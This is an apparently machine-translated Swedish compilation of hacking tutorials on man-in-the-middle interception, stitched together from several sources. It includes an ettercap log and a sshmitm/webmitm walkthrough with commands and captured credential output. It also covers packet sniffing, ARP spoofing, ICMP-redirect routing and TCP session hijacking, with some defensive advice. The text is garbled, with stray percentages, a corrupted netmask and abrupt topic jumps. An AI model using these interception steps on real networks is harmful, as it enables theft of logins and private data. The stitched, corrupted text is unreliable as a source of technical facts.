Root@HackWare:~# ettercap -TQP search_promisc ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team Lyssnar på: eth0 -> 08:00:27:AF:30:B9 192.168.1.35/255.255.805:a:.05:a 27ff:feaf:30b9/64 SSL-dissektion behöver ett giltigt "redir_command_on"-skript i etter.conf-filen Ettercap kanske inte fungerar korrekt. /proc/sys/net/ipv6/conf/eth0/use_tempaddr är inte inställd på 0. Behörigheter släpps till EUID 65534 EGID 65534... 33 plugins 42 protokolldissektorer 57 portar övervakade 20388 mac-leverantörs fingeravtryck 1766 fingeravtryckstjänster Luap OS 218 tc : inga skript specificerades, startar inte! Randomiserar 255 värdar för skanning... Skannar hela nätmasken efter 255 värdar... * |============================== ===================================>| 100,00% 5 värdar har lagts till i värdlistan... Startar Unified sniffing... Endast text Gränssnitt aktiverat... Tryck på "h" för inline hjälp Aktiverar search_promisc plugin... search_promisc: Söker promisc NIC... Mindre troligt sniffande NIC : - 192.168.1.36 - 192.168.1.34 Med största sannolikhet sniffar NIC: - INGEN Stänger textgränssnittet... Avslutar ettercap... Lua-rensningen klar! Unified sniffing stoppades.

7,9 sslstrip

Under en SSL mitm-attack ersätter ettercap det riktiga SSL-certifikatet med sitt eget. Det falska certifikatet skapas i farten och alla fält fylls i i enlighet med det verkliga certifikatet som servern presenterar.

(62%)

(56.5%)

(RANDOM - 0,2 %)

I den här artikeln kommer vi att titta på attacker som Man-in-the-Middle, eller snarare metoden
omdirigering av SSH- och HTTP-trafik med hjälp av Man in the Middle-attacken. Låt oss inte dra katten i svansen, utan låt oss börja.

Man in the Middle (kort sagt MitM, från ryska helt enkelt - "attack av mellanhand" eller "man
i mitten") är en typ av attack baserad på att omdirigera trafik mellan två maskiner för att fånga upp information - studera vidare, förstöra eller ändra den. Så det första vi behöver är dsniff-paketet (du kommer att se en länk till paketet på slutet av artikeln). Varför Ja, eftersom det här paketet innehåller alla nödvändiga verktyg, inklusive sshmitm (omdirigerar SSH-trafik) och httpmitm (omdirigerar HTTP-trafik), som kan kringgå följande säkerhetsschema: så vitt du vet, protokoll med datakryptering är ganska -de är "säkra" (kryptering hjälper :)) och tillåter inte attacker att utföras "ovanpå" nätverkslagret. Krypteringsnyckeln är okänd för hackaren - det är omöjligt att dekryptera data och infoga ett kommando också. Allt verkar bra, men här är hur
eftersom MitM-attackprogrammen (sshmitm och httpmitm) från dsniff-paketet kan kringgås detta system säkerhet (du kan kringgå nästan allt). Allt detta görs enligt följande princip:
mellanvärden tar emot begäran från klienten, "berättar" för den att det är servern och ansluter sedan till den riktiga servern.
Det andra vi behöver är raka armar, det fjärde - det viktigaste - är lusten, och naturligtvis ett offer, det vill säga datorn som vi kommer att attackera.

Omdirigerar SSH-trafik

Efter att ha förberett verktygen förstod du vad som var vad och varför :). Skaffa sshmitm - nu kommer vi att omdirigera SSH-trafik (allt som du inte förstod med den teoretiska delen - läs ovan)
använda den och dra nytta av bristerna i dagens PKI (public key infrastructure - ett nyckelhanteringssystem baserat på
metoder för asymmetrisk kryptografi). Låt oss titta på syntaxen
sshmitm:

sshmitm [-d] [-I] [-p port] värd

D
tillåt felsökning (dvs mer avancerat läge)

jag
sessionskapning

P-port
lyssningsport

värd
adressen till fjärrvärden vars sessioner kommer att avlyssnas

hamn
port på fjärrvärden

Allt verkar enkelt och smakfullt - det är inget komplicerat :). Låt oss börja genomföra attacken!

# sshmitm server.target.gov // ange din SSH-server
sshmitm: vidarebefordran till server server.target.gov

Eftersom vi inte har en riktig SSH-nyckel, är kommandotolken för den attackerade
kommer att visa en begäran om att kontrollera värdnyckeln, allt kommer att se ut ungefär så här:

klientmaskin$ server.target.gov
@VARNING: IDENTIFIERING AV FJÄRRVÄRDEN HAR ÄNDRATS! @
DET ÄR MÖJLIGT ATT NÅGON GÖR NÅGOT OLEMT!
Någon kan avlyssna dig just nu (man-in-the-midten attack)!
Det är också möjligt att RSA-värdnyckeln just har ändrats.
Kontakta din systemadministratör.

Och sedan kommer användaren att bestämma om han vill ansluta eller inte. Om ja, kommer vi att ha full kontroll över SSH-sessionen.
MEN! Om användaren aldrig har anslutit till den bilen kan följande meddelande visas:

Äktheten för värden "server.target.gov" kan inte fastställas
RSA nyckel fingeravtryck är
bla:bla:bla;bla;bla........
Är du säker på att du vill fortsätta ansluta (ja/nej)?

Här har användaren också två val - att ansluta eller inte. Om ja, så avlyssnade vi sessionen, om inte, så tyvärr... :(.
I allmänhet lyckades attacken om användaren kopplade upp sig och sshmitm i sin tur spelade in alla pass och inloggningar och på ett mycket läsbart sätt :)
Naturligtvis är detta inte den enda SSH-sessionsinterceptorn, men när du väl har blivit bekant med detta kan du enkelt bemästra en annan :)

Omdirigerar HTTP-trafik

Nu kommer vi att omdirigera HTTP-trafik. Återigen kommer vi att behöva ett tidigare valt verktyg: httpmitm, som lyssnar på portarna 80 (HTTP -) och 443 (HTTPS -), avlyssnar WEB-förfrågningar, ansluter sedan till servern och vidarebefordrar förfrågningarna till klientdatorn. Programmet genererar även SSL-nycklar och SSL-certifikat med OpenSSL. Sedan, efter att ha försökt
ansluter till webbplatsen (target.gov), kommer webbläsaren att kontrollera SSL-certifikatet. Eftersom certifikaten inte matchar kommer användarens webbläsare att varna om
felaktigt SSL-certifikat. Ur angriparens perspektiv kommer det att se ut ungefär så här:

#webmitm -d
webmitm: vidarebefordra transparent
webmitm: ny anslutning från
HÄMTA [länk]/uzerz.php?user=hellknights&password=neskaju1qwerty HTTP/[version]
Kopplingstyp]
Värd: www.target.gov
User-Agent: [system, webbläsarinformation]
[etc, etc, etc]
Cookie: [cookies]

Så här ser det ut från utsidan -
SSL-anslutningen fångas upp och fångar okrypterad data.

Slutsats

I den här artikeln tittade vi på omdirigeringen av SSH- och HTTP-trafik med hjälp av Man in the Middle-attacken - helt klart, i detalj, kortfattat. Andra HTTP- och SSH-omdirigerare
Du kommer snabbt att bemästra trafiken med MitM om du behärskar dessa också :)). Om något var oklart, då...

Avlyssning av data över ett nätverk är mottagandet av all information från en fjärrdatorenhet. Det kan bestå av användarens personliga information, hans meddelanden och register över webbplatsbesök. Datainsamling kan utföras med spionprogram eller med hjälp av nätverkssniffer.

Spionprogram är en speciell programvara som kan registrera all information som sänds över ett nätverk från en specifik arbetsstation eller enhet.

En sniffer är ett program eller datorteknik som fångar upp och analyserar trafik som passerar genom ett nätverk. Med sniffern kan du ansluta till en webbsession och utföra olika operationer på uppdrag av datorägaren.

Om information inte överförs i realtid, spionprogram generera rapporter som gör det bekvämt att se och analysera information.

Nätavlyssning kan utföras lagligt eller olagligt. Det huvudsakliga dokumentet som fastställer lagligheten av att få information är konventionen om it-brottslighet. Det skapades i Ungern 2001. De juridiska kraven kan variera något från stat till stat, men nyckelbudskapet är detsamma för alla länder.

Klassificering och metoder för att fånga data över nätverket

I enlighet med ovanstående kan avlyssning av information över ett nätverk delas in i två typer: auktoriserad och obehörig.

Auktoriserad datafångst utförs för olika ändamål, allt från att skydda företagsinformation till att säkerställa nationell säkerhet. Skälen för att utföra en sådan operation bestäms av lagstiftning, specialtjänster, brottsbekämpande tjänstemän och specialister administrativa organisationer och företagssäkerhetstjänster.

Det finns internationella standarder för att utföra dataavlyssning. European Telecommunications Standards Institute har lyckats harmonisera ett antal tekniska processer (ETSI ES 201 158 "Telekommunikationssäkerhet; Laglig avlyssning (LI); Krav på nätverksfunktioner") som avlyssningen av information bygger på. Som ett resultat utvecklades en systemarkitektur som hjälper underrättelsetjänstspecialister och nätverksadministratörer att lagligt få data från nätverket. Den utvecklade strukturen för att implementera dataavlyssning över nätverket används för trådbundna och trådlösa system röstsamtal, samt korrespondens per post, överföring av röstmeddelanden över IP, utbyte av information via SMS.

Otillåten avlyssning av data över ett nätverk utförs av angripare som vill ta konfidentiell data, lösenord, företagshemligheter, adresser till datormaskiner på nätverket, etc. i besittning. För att uppnå sina mål använder hackare vanligtvis en nätverkstrafikanalysator - en sniffer. Det här programmet eller en hårdvaru-mjukvaruenhet ger bedragaren möjligheten att fånga upp och analysera information inom nätverket som offrets användare är ansluten till, inklusive krypterad SSL-trafik genom certifikatspoofing. Trafikdata kan erhållas på olika sätt:

lyssna på nätverksgränssnittet,
ansluta en avlyssningsanordning till ett kanalavbrott,
skapa en trafikgren och duplicera den till sniffern,
genom att utföra en attack.

Det finns också mer komplexa tekniker för att fånga upp viktig information som gör att man kan inkräkta på nätverksinteraktioner och ändra data. En sådan teknik är falska ARP-förfrågningar. Kärnan i metoden är att ersätta IP-adresser mellan offrets dator och angriparens enhet. En annan metod som kan användas för att fånga upp data över ett nätverk är falsk routing. Det innebär att ersätta IP-adressen för en nätverksrouter med din egen adress. Om en cyberkriminell vet hur det lokala nätverket där offret befinner sig är organiserat, kan han enkelt organisera mottagandet av information från användarens maskin till sin IP-adress. Att fånga en TCP-anslutning fungerar också på ett effektivt sätt dataavlyssning. Angriparen avbryter kommunikationssessionen genom att generera och skicka TCP-paket till offrets dator. Därefter återställs kommunikationssessionen, avlyssnas och fortsätter av brottslingen istället för klienten.

Objekt för inflytande

Objekt för dataavlyssning över nätverket kan vara statliga myndigheter, industriföretag, kommersiella strukturer och vanliga användare. Inom en organisation eller ett företag kan information samlas in för att skydda nätverksinfrastrukturen. Underrättelsemyndigheter och brottsbekämpande myndigheter kan utföra massavlyssning av information som överförs från olika ägare, beroende på vilken uppgift som är aktuell.

Om vi pratar om cyberbrottslingar kan vilken användare eller organisation som helst bli föremål för påverkan för att få data som överförs över nätverket. Med auktoriserad åtkomst är den informativa delen av den mottagna informationen viktig, medan en angripare är mer intresserad av data som kan användas för att beslagta i kontanter eller värdefull information för dess efterföljande försäljning.

Oftast blir användare som ansluter till ett offentligt nätverk, till exempel på ett kafé med en hotspot, offer för informationsavlyssning av cyberbrottslingar. Wi-Fi. En angripare ansluter till en webbsession med hjälp av en sniffer, ersätter data och stjäl personlig information. Läs mer om hur detta går till i artikeln.

Källa till hot

Auktoriserad avlyssning av information i företag och organisationer utförs av operatörer av allmän nätinfrastruktur. Deras verksamhet syftar till att skydda personuppgifter, affärshemligheter och annat viktig information. Juridiskt kan överföringen av meddelanden och filer övervakas av underrättelsetjänster, brottsbekämpande myndigheter och olika statliga myndigheter för att säkerställa säkerheten för medborgarna och staten.

Brottslingar är engagerade i olaglig dataavlyssning. För att undvika att bli offer för en cyberbrottsling måste du följa några rekommendationer från experter. Du bör till exempel inte utföra operationer som kräver auktorisering och överföring av känsliga uppgifter på platser där anslutningen är till publika nätverk. Det är säkrare att välja nätverk med kryptering, och ännu bättre - att använda personliga 3G- och LTE-modem. Vid överföring av personuppgifter rekommenderas det att kryptera dem med HTTPS-protokollet eller en personlig VPN-tunnel.

Du kan skydda din dator från avlyssning av nätverkstrafik med hjälp av kryptografi och anti-sniffer; Uppringd i stället för trådlös nätverksåtkomst minskar riskerna.

Den här lektionen beskriver nätverkshackningstekniker baserade på att fånga upp nätverkspaket. Hackare använder sådan teknik för att lyssna på nätverkstrafik för att stjäla värdefull information, för att organisera dataavlyssning i syfte att en man-in-the-middle-attack, för att avlyssna TCP-anslutningar, tillåta, säg, dataspoofing, och för att utföra andra , inte mindre intressanta åtgärder. Tyvärr är de flesta av dessa attacker faktiskt implementerade endast för Unix-nätverk, för vilka hackare kan använda båda särskilda verktyg, och Unix-systemverktyg. Windows-nätverk har uppenbarligen ignorerats av hackare, och vi tvingas begränsa vår beskrivning av verktyg för dataavlyssning till att sniffa program som är designade för trivial avlyssning av nätverkspaket. Man bör dock inte försumma åtminstone en teoretisk beskrivning av sådana attacker, särskilt för anti-hackers, eftersom kunskap om hackningsteknikerna som används kommer att hjälpa till att förhindra många problem.

Nätverkssnuffning

Används vanligtvis för att sniffa Ethernet-nätverk. nätverkskort bytte till lyssningsläge. Lyssnande Ethernet-nätverk kräver att en dator som kör ett snifferprogram kopplas till ett nätverkssegment, varefter all nätverkstrafik som skickas och tas emot av datorer i detta nätverkssegment blir tillgänglig för hackaren. Det är ännu lättare att avlyssna trafik från radionätverk som använder trådlösa nätverksförmedlare – i det här fallet behöver du inte ens leta efter en plats att ansluta till kabeln. Eller så kan en angripare ansluta till telefonlinjen som ansluter datorn till internetservern och hitta en lämplig plats för detta (telefonlinjer läggs vanligtvis i källare och andra sällan besökta platser utan något skydd).

För att demonstrera sniffningsteknik kommer vi att använda det mycket populära snifferprogrammet SpyNet, som finns på många webbplatser. SpyNet-programmets officiella webbplats finns på http://members.xoom.com/layrentiu2/, där du kan ladda ner en demoversion av programmet.

SpyNet-programmet består av två komponenter - CaptureNet och PipeNet. CaptureNet-programmet låter dig fånga upp paket som överförs över ett Ethernet-nätverk på nätverksnivå, d.v.s. i form av Ethernet-ramar. PipeNet-programvaran låter dig sätta ihop Ethernet-ramar till applikationslagerpaket, återställa till exempel meddelanden E-post, HTTP-protokollmeddelanden (informationsutbyte med webbservern) och utföra andra funktioner.

Tyvärr, i SpyNet-demon, är PipeNets möjligheter begränsade till HTTP-paketmonteringsdemon, så vi kommer inte att kunna demonstrera SpyNet i sin helhet. Vi kommer dock att demonstrera nätverkssniffningsförmågan hos SpyNet med vårt experimentella nätverk som exempel genom att passera textfil från Sword-2000-värden till Alex-Z-värden med det vanliga Windows utforskaren. Samtidigt kommer vi på A1ex-1-datorn att starta programmet CaptureNet, som kommer att fånga upp de överförda paketen och låta oss läsa innehållet i den överförda filen i Ethernet-ramar. I fig. 1 visar texten för det hemliga meddelandet i filen secret.txt; vi kommer att försöka hitta denna text i de fångade Ethernet-ramarna.

Ris. 1. Texten till det hemliga meddelandet i fönstret Anteckningar

Följ dessa steg för att fånga Ethernet-ramar:

Kör programmet CaptureNet på Alex-Z-datorn. I det visade arbetsfönstret för programmet, välj menykommandot Capture * Start (Capture * Start) och starta processen med att fånga upp nätverksramar.

Använd Windows Explorer och kopiera filen security.txt från Sword-2000-datorn till A1ex-3.

När du har överfört filen secret.txt väljer du menykommandot Capture * Stop och stoppar insamlingsprocessen.

De fångade Ethernet-ramarna kommer att visas på höger sida av CaptureNet-programfönstret (Figur 2), där varje rad i topplistan representerar en Ethernet-ram, och under listan innehållet i den valda ramen.

Ris. 2. Ethernet-ramen innehåller hemlig meddelandetext

Efter att ha tittat igenom listan över avlyssnade ramar kan vi enkelt hitta den som innehåller texten vi överförde. Detta är en mycket stor hemlighet (Detta är en mycket stor hemlighet).

Vi betonar att detta är det enklaste exemplet, då all avlyssnad nätverkstrafik registrerades. CaptureNet låter dig fånga upp paket som skickas över specifika protokoll och till specifika värdportar, välja meddelanden med specifikt innehåll och samla infångad data i en fil. Tekniken för att utföra sådana åtgärder är enkel och kan läras med hjälp av SpyNet-programmets hjälpsystem.

Förutom primitiv nätverksavlyssning har hackare tillgång till mer sofistikerade metoder för dataavlyssning. Nedan följer en kort översikt över sådana metoder, om än ur en teoretisk aspekt. Anledningen är att för Windows-nätverk är den praktiska implementeringen av dataavlyssningsattacker extremt begränsad, och uppsättningen av tillförlitliga verktyg för avlyssningsattacker är ganska dålig.

Metoder för att avlyssna nätverkstrafik

Nätverkssniffning med nätverksanalysprogram som CaptureNet ovan är det första, enklaste sättet att fånga upp data. Förutom SpyNet används många verktyg för nätverkssniffning, som ursprungligen utvecklades för att analysera nätverksaktivitet, diagnostisera nätverk, välja trafik enligt specificerade kriterier och andra nätverksadministrativa uppgifter. Ett exempel på ett sådant program är tcpdump (http://www.tcpdump.org), som låter dig registrera nätverkstrafik i en speciell logg för efterföljande analys.

För att skydda mot nätverksavlyssning används speciella program, till exempel AntiSniff (http://www.securitysoftwaretech.com/antisniff), som kan identifiera datorer i nätverket som lyssnar på nätverkstrafik. För att lösa sina problem använder antisnifferprogram ett speciellt tecken på närvaron av lyssningsenheter i nätverket - nätverkskortet på snifferdatorn måste vara i ett speciellt lyssningsläge. I lyssningsläge reagerar nätverksdatorer på ett speciellt sätt på IP-datagram som skickas till värden som testas. Till exempel behandlar lyssnande värdar vanligtvis all inkommande trafik, inte bara datagram som skickas till värdens adress. Det finns andra tecken som tyder på misstänkt värdbeteende som AntiSniff kan känna igen.

Falska ARP-förfrågningar

För att fånga upp och ta över processen för nätverksinteraktion mellan två värdar A och B, kan en angripare ersätta IP-adresserna för interagerande värdar med sin egen IP-adress genom att skicka förfalskade ARP-meddelanden (Address Resolution Protocol) till värdarna A och B. Du kan bekanta dig med ARP-protokollet i Appendix D, som beskriver proceduren för att lösa (konvertera) värdens IP-adress till den maskinadress (MAC-adress) som är hårdkodad i värdens nätverkskort. Låt oss se hur en hackare kan använda ARP för att avlyssna nätverkskommunikation mellan värdarna A och B.

Angriparen bestämmer MAC-adresserna för värdarna A och B, till exempel med hjälp av kommandot nbtstat från W2RK-paketet.

Angriparen skickar meddelanden till de identifierade MAC-adresserna för värdarna A och B, som är förfalskade ARP-svar på förfrågningar om att lösa värdarnas IP-adresser till datorers MAC-adresser. Värd A informeras om att IP-adressen för värd B motsvarar MAC-adressen för angriparens dator; värd B informeras om att IP-adressen för värd A också motsvarar MAC-adressen för angriparens dator.

Värdarna A och B lagrar de mottagna MAC-adresserna i sina ARP-cacher och använder dem sedan för att skicka meddelanden till varandra. Eftersom IP-adresserna A och B motsvarar MAC-adressen för angriparens dator, kommunicerar värdarna A och B, intet ont anande, genom en mellanhand som kan göra vad som helst med deras meddelanden.

För att skydda mot sådana attacker måste nätverksadministratörer upprätthålla en databas med en överensstämmelsetabell mellan MAC-adresserna och IP-adresserna för deras nätverksdatorer. Nästa, med hjälp av en speciell programvara Till exempel kan arpwatch-verktygen (ftp://ftp.ee.lbl.gov/arpwatch-2.lab.tar.gz) periodiskt övervaka nätverket och identifiera inkonsekvenser.

På UNIX-nätverk kan den här typen av falska ARP-begäransattacker implementeras med hjälp av systemverktyg för att övervaka och hantera nätverkstrafik, såsom arpredirect. Tyvärr verkar sådana tillförlitliga verktyg inte vara implementerade på Windows 2000/XP-nätverk. Till exempel, på NTsecurity-webbplatsen (http://www.ntsecurity.nu) kan du ladda ner verktyget GrabitAII, presenterat som ett verktyg för att omdirigera trafik mellan nätverksvärdar. En grundläggande kontroll av funktionaliteten hos GrabitAII-verktyget visar dock att fullständig framgång med att implementera dess funktioner fortfarande är långt borta.

Falsk routing

För att utföra falsk routing måste angriparen känna till vissa detaljer om organisationen av det lokala nätverk där värd A är belägen, i synnerhet IP-adressen till routern genom vilken trafik skickas från värd A till B. Angriparen känner till detta. kommer att generera ett IP-datagram där IP -avsändaradressen definieras som IP-adressen för routern, och mottagaren är värd A. I datagrammet ingår också ett ICMP Redirect-meddelande med adressfältet för den nya routern inställt på IP-adressen till angriparens dator. Efter att ha mottagit ett sådant meddelande kommer värd A att skicka alla meddelanden till IP-adressen för angriparens dator.

Ovanstående exempel på avlyssningar (till vilka angriparnas möjligheter är långt ifrån begränsade) övertygar om behovet av att skydda data som överförs över nätverket om data innehåller konfidentiell information. Den enda metoden för skydd mot avlyssning av nätverkstrafik är användningen av program som implementerar kryptografiska algoritmer och krypteringsprotokoll och förhindrar avslöjande och ersättning av hemlig information. För att lösa sådana problem tillhandahåller kryptografi verktyg för att kryptera, signera och verifiera äktheten av meddelanden som överförs via säkra protokoll

Den praktiska implementeringen av alla kryptografiska metoder för att skydda informationsutbyte som beskrivs i kapitel 4 tillhandahålls av VPN-nätverk (Virtual Private Network). En kort översikt över kryptografiska säkerhetsprinciper och -tekniker finns i Appendix E, och detaljerad beskrivning kryptografiska skyddsverktyg som tillhandahålls av programmet PGP Desktop Security (http://www.pgp.com).

TCP-anslutningsavlyssning

Flera effektiva verktyg har skapats för att utföra TCP-anslutningskapningsattacker, men alla är implementerade för Unix-plattformen, och på webbplatser presenteras dessa verktyg endast i källkodsform. Därför, som övertygade utövare av den ädla orsaken till hacking, är attacker med TCP-anslutningsavlyssningsmetoden inte till stor nytta för oss. (Den som gillar att förstå andras programkod kan hänvisa till webbplatsen http://www.cri.cz/~kra/index.html, där du kan ladda ner källa det välkända Hunt TCP-anslutningsavlyssningsverktyget från Pavel Krauz).

Trots bristen på praktiska verktyg kan vi inte ignorera ett så intressant ämne som att avlyssna TCP-anslutningar, och vi kommer att uppehålla oss vid vissa aspekter av sådana attacker. Viss information om strukturen hos ett TCP-paket och proceduren för att upprätta TCP-anslutningar ges i bilaga D i denna bok, men här kommer vi att fokusera på frågan - vad exakt tillåter hackare att utföra TCP-anslutningsavlyssningsattacker? Låt oss överväga detta ämne mer i detalj, huvudsakligen förlita oss på diskussionen i och.

TCP-protokollet (Transmission Control Protocol) är ett av de grundläggande OSI-transportskiktsprotokollen som låter dig upprätta logiska anslutningar över en virtuell kommunikationskanal. Över denna kanal sänds och tas emot paket med deras sekvens registrerad, flödet av paket kontrolleras, återsändning av förvrängda paket organiseras och i slutet av sessionen bryts kommunikationskanalen. TCP-protokollet är det enda kärnprotokollet i TCP/IP-familjen som har ett avancerat meddelandeidentifiering och anslutningssystem.

För att identifiera ett TCP-paket finns det två 32-bitars identifierare i TCP-huvudet, som också fungerar som paketräknare, kallade sekvensnummer och bekräftelsenummer. Vi kommer också att vara intresserade av ytterligare ett fält av TCP-paketet, kallat kontrollbitar. Detta 6-bitarsfält innehåller följande kontrollbitar (i ordning från vänster till höger):

URG - brådskande flagga;

ACK - bekräftelseflagga;

PSH - bärflagga;

RST - flagga för återetablering av anslutning;

SYN - synkroniseringsflagga;

FIN - flagga för anslutningsavslutning.

Låt oss titta på proceduren för att skapa en TCP-anslutning.

1. Om värd A behöver skapa en TCP-anslutning med värd B, skickar värd A värd B följande meddelande:

A -> B: SYN, ISSa

Detta betyder att meddelandet som skickas av värd A har SYN-flaggan (Synkronisera sekvensnummer) inställd, och sekvensnummerfältet är satt till det initiala 32-bitarsvärdet ISSa (Initial Sequence Number).

2. Som svar på begäran mottagen från värd A, svarar värd B med ett meddelande i vilket SYN-biten är satt och ACK-biten är inställd. I sekvensnummerfältet ställer värd B in sitt initiala räknarvärde - ISSb; fältet för bekräftelsenummer kommer då att innehålla ISSa-värdet mottaget i det första paketet från värd A, ökat med ett. Så värd B svarar med detta meddelande:

B -> A: SYN, ACK, ISSb, ACK(ISSa+1)

3. Slutligen sänder värd A ett meddelande till värd B, i vilket: ACK-biten är satt; sekvensnummerfältet innehåller värdet ISSa + 1; Fältet för bekräftelsenummer innehåller värdet ISSb + 1. Efter detta anses TCP-anslutningen mellan värdarna A och B vara etablerad:

A -> B: ACK, ISSa+1, ACK(ISSb+1)

4. Nu kan värd A skicka datapaket till värd B över den nyskapade virtuella TCP-kanalen:

A -> B: ACK, ISSa+1, ACK(ISSb+1); DATA

Här står DATA för data.

Från algoritmen för att skapa en TCP-anslutning diskuterad ovan, kan det ses att de enda identifierarna för TCP-abonnenter och en TCP-anslutning är två 32-bitars parametrar för sekvensnumret och bekräftelsenumret - ISSa och ISSb. Därför, om en hacker lyckas ta reda på de aktuella värdena för ISSa- och ISSb-fälten, kommer ingenting att hindra honom från att generera ett förfalskat TCP-paket. Detta innebär att en hackare bara behöver välja de aktuella värdena för ISSa- och ISSb-parametrarna för ett TCP-paket för en given TCP-anslutning, skicka paketet från vilken Internetvärd som helst på uppdrag av klienten för denna TCP-anslutning, och detta paket kommer att uppfattas som korrekt!

Faran med sådan TCP-paketförfalskning är också viktig eftersom FTP- och TELNET-protokollen på hög nivå implementeras baserat på TCP-protokollet, och identifieringen av FTP- och TELNET-paketklienter är helt baserad på TCP-protokollet.

Dessutom, eftersom FTP- och TELNET-protokollen inte kontrollerar IP-adresserna för meddelandeavsändare, efter att ha tagit emot ett förfalskat paket, kommer FTP- eller TELNET-servrarna att skicka ett svarsmeddelande till IP-adressen för hackervärden som anges i det falska paketet. Efter detta kommer hackervärden att börja arbeta med FTP- eller TELNET-servern från sin IP-adress, men med rättigheterna för en lagligt ansluten användare, som i sin tur kommer att förlora kontakten med servern på grund av att räknarna inte matchar.

För att utföra attacken som beskrivs ovan är ett nödvändigt och tillräckligt villkor kunskap om de två nuvarande 32-bitarsparametrarna ISSa och ISSb som identifierar TCP-anslutningen. Låt oss överväga möjliga sätt tar emot dem. I fallet när hackervärden är ansluten till det attackerade nätverkssegmentet är uppgiften att erhålla värdena för ISSa och ISSb trivial och kan lösas genom att analysera nätverkstrafiken. Därför är det nödvändigt att tydligt förstå att TCP-protokollet i princip tillåter att skydda en anslutning endast om det är omöjligt för en angripare att fånga upp meddelanden som sänds över detta samband, det vill säga endast i fallet när hackervärden är ansluten till ett nätverkssegment som skiljer sig från abonnentsegmentet för TCP-anslutningen.

Därför är intersegment-attacker av störst intresse för en hackare, när angriparen och hans mål befinner sig i olika nätverkssegment. I det här fallet är uppgiften att erhålla värdena för ISSa och ISSb inte trivial. För att lösa detta problem har nu bara två metoder uppfunnits.

Matematisk förutsägelse av initialvärdet för TCP-anslutningsparametrar genom extrapolering av tidigare värden för ISSa och ISSb.

Utnyttja sårbarheter för att identifiera TCP-anslutningsabonnenter på Unix rsh-servrar.

Den första uppgiften löses genom fördjupade studier av implementeringen av TCP-protokollet i olika operativsystem och har nu en rent teoretisk betydelse. Det andra problemet löses med hjälp av sårbarheter Unix-system genom att identifiera betrodda värdar. (Betrodd med avseende på en given värd A är en nätverksvärd B vars användare kan ansluta till värd A utan autentisering med hjälp av r-tjänsten hos värd A). Genom att manipulera parametrarna för TCP-paket kan en hackare försöka utge sig för att vara en betrodd värd och fånga upp en TCP-anslutning med den attackerade värden.

Allt detta är mycket intressant, men de praktiska resultaten av denna typ av forskning är ännu inte synliga. Därför råder vi alla som vill fördjupa sig i detta ämne att vända sig till boken, varifrån informationen som presenteras ovan huvudsakligen hämtades.

Slutsats

Att fånga upp nätverksdata är den mest effektiva metoden för nätverkshackning, vilket gör att en hackare kan få nästan all information som cirkulerar på nätverket. Den största praktiska utvecklingen har uppnåtts av sniffningsverktyg, d.v.s. lyssna på nätverk; Vi kan dock inte ignorera metoder för att fånga upp nätverksdata, utförda genom att störa nätverkets normala funktion för att omdirigera trafik till en hackervärd, särskilt metoder för att avlyssna TCP-anslutningar. Men i praktiken har de sistnämnda metoderna ännu inte fått tillräcklig utveckling och behöver förbättras.

En anti-hacker bör veta att den enda räddningen från dataavlyssning är dess kryptering, d.v.s. kryptografiska skyddsmetoder. När du skickar ett meddelande över nätverket bör du i förväg anta att nätverkets kabelsystem är absolut sårbart, och alla hackare som är anslutna till nätverket kommer att kunna fånga alla överförda hemliga meddelanden från det. Det finns två tekniker för att lösa detta problem - skapa ett VPN-nätverk och kryptera själva meddelandena. Alla dessa uppgifter är mycket enkla att lösa med hjälp av mjukvarupaketet PGP Desktop Security (dess beskrivning finns till exempel i).

Populär i kategorin: